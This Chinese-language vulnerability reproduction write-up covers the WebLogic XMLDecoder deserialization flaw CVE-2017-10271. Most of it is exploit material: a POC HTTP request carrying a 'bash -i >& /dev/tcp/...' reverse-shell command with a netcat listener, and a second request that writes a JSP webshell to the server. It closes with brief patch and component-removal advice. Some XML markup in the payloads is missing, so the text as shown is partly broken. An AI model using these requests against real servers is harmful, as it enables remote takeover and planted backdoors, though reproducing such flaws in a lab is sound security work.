Weblogic反序列化漏洞(CVE-2017-10271)

CVE-2017-10271

漏洞描述

这个漏洞的核心就是XMLDecoder的反序列化漏洞
影响版本:
10.3.6.0.0,12.1.3.0.0,12.2.1.1.0,12.2.1.2.0

验证

Weblogic反序列化漏洞(CVE-2017-10271)_第1张图片
漏洞存在点:http://172.20.10.13:7001/wls-wsat/CoordinatorPortType
在这里插入图片描述
(存在此页面即可能存在该漏洞)

利用

反弹shell
POC:

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: your-ip:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 633

 





/bin/bash


-c


bash -i >& /dev/tcp/10.0.0.1/21 0>&1








监听端口(IP:172.20.10.13)

xu@ubuntu:~$ nc -lvvp 8888
Listening on [0.0.0.0] (family 0, port 8888)

Weblogic反序列化漏洞(CVE-2017-10271)_第2张图片
拿到shell:
Weblogic反序列化漏洞(CVE-2017-10271)_第3张图片
写入webshell

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: your-ip:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 638


    
    
    
     
    servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp
    
    
    ]]>
    
    
    
    
    
    
    

访问http://172.20.10.13:7001/bea_wls_internal/test.jsp
Weblogic反序列化漏洞(CVE-2017-10271)_第4张图片
成功写入

修复

  1. 删除WLS-WebServices组件(可能会影响业务)该组件路径如下:

Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat
Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/wls-wsat.war
Middleware/wlserver_10.3/server/lib/wls-wsat.war

  1. 前往Oracle官网下载所提供的该漏洞安全补丁

参考文章:
https://blog.csdn.net/qq_29647709/article/details/84928306
https://github.com/Tom4t0/Tom4t0.github.io/blob/master/_posts/2017-12-22-WebLogic WLS-WebServices组件反序列化漏洞分析.md

你可能感兴趣的:(漏洞复现)